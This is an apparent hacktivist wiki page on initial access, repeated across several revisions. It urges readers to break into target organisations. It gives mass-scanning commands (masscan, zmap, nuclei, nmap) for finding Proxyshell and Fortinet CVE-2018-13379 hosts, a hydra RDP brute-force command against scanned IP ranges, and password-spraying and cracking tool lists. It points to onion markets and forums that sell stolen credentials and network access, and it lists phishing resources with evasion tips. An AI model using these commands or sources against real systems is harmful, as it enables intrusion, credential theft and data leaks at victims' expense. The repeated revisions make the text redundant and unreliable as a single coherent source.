Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.

=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.

* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/sc0tfree/mentalist
* https://github.com/urbanadventurer/username-anarchy
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/shroudri/username_generator

=== Passwords ===
Common and leaked credentials to test login portals and network services.

==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet

==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

=== Password cracking tools ===

* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://github.com/1N3/BruteX

=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]

==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

* https://haveibeenpwned.com
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]

Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.

=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.

* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/knavesec/CredMaster
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper

=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!

==== Identify hash ====
* https://github.com/blackploit/hash-identifier

==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net

==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules

== Buying access ==

You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])

== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.

=== Prerequisites ===
There are some prerequisites you will need to follow the below examples:
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].

=== Networks ===
==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

'''IP Ranges''':
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0

===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]

'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>

* <code>sed -i 's/$/:443/' results.txt</code>

*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>

Exploit Discovered hosts: [[Proxyshell]]

===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]

'''Tool''': [https://github.com/zmap/zmap zmap]

'''1.''' Scan for Microsoft Exchange E-mail Servers:
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>

[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]

===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See [[Domain Spray and Pray]] scanning.

==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.

===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>

===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

Initial Access Tactics, techniques and procedures

2024-03-25T17:11:10Z

Booda: /* VPN */

== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.

==== Tools ====
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office

== Password Attacks ==
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.

=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.

* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/sc0tfree/mentalist
* https://github.com/urbanadventurer/username-anarchy
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/shroudri/username_generator

=== Passwords ===
Common and leaked credentials to test login portals and network services.

==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet

==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

=== Password cracking tools ===

* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://github.com/1N3/BruteX

=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]

==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

* https://haveibeenpwned.com
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]

Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.

=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.

* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/knavesec/CredMaster
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper

=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!

==== Identify hash ====
* https://github.com/blackploit/hash-identifier

==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net

==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules

== Buying access ==

You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])

== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.

=== Prerequisites ===
There are some prerequisites you will need to follow the below examples:
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].

=== Networks ===
==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

'''IP Ranges''':
* List all IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* IP Address Ranges by Country: https://lite.ip2location.com/ip-address-ranges-by-country ([https://github.com/ip2location/ip2location-python-csv-converter parse output])
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0

===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]

'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>

* <code>sed -i 's/$/:443/' results.txt</code>

*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>

Exploit Discovered hosts: [[Proxyshell]]

===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]

'''Tool''': [https://github.com/zmap/zmap zmap]

'''1.''' Scan for Microsoft Exchange E-mail Servers:
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>

[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]

===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See [[Domain Spray and Pray]] scanning.

==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.

===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>

===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

Initial Access Tactics, techniques and procedures

2024-03-25T17:11:00Z

Booda: /* RDP */

== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.

==== Tools ====
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office

== Password Attacks ==
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.

=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.

* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/sc0tfree/mentalist
* https://github.com/urbanadventurer/username-anarchy
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/shroudri/username_generator

=== Passwords ===
Common and leaked credentials to test login portals and network services.

==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet

==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

=== Password cracking tools ===

* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://github.com/1N3/BruteX

=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]

==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

* https://haveibeenpwned.com
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]

Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.

=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.

* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/knavesec/CredMaster
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper

=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!

==== Identify hash ====
* https://github.com/blackploit/hash-identifier

==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net

==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules

== Buying access ==

You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])

== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.

=== Prerequisites ===
There are some prerequisites you will need to follow the below examples:
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]
